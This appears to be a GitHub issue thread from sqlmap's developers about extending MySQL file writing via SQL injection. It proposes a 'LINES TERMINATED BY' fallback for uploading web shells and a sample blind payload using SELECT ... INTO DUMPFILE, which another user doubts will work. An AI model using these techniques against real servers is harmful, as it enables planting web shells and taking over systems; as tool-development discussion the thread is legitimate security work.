Extend file write on MySQL

[bdamele]

When UNION and stacked queries SQL injection techniques are not supported and the back-end database is MySQL, sqlmap currently cannot upload a file with --file-write.

Vice versa, --os-cmd/-shell/-pwn does implement as a primary technique the 'LINES TERMINATED BY' regardless of what SQL injection technique is detected, and works.
Nonetheless, if this technique fails and UNION query is not available, sqlmap is unsuccessful.

Solution:

• Port the 'LINES TERMINATED BY' to dbms/mysql/filesystem.py: as a fall-back to stacked queries and UNION query SQL injection only as the resulting file with have leftover characters at the beginning from the original SQL statement - this is acceptable for a file stager / web shell upload in lib/takeover/web.py, but may not be for a clean --file-write so notify the user with a warning message.
• Implement file write / web shell upload with boolean-based, time-based and possibly with error-based payload too - e.g. 1 AND (SELECT 0xHEX INTO DUMPFILE 'PATH').

[brandonprry]

IRT your mention of SELECT INTO DUMPFILE in the subquery. I don't believe that's technically possible but willing to eat my words. I have looked into it in the past and don't remember getting it working. Some cursory googling just now brought this stack overflow.

http://stackoverflow.com/questions/15746743/mysql-insert-cant-with-select-into-outfile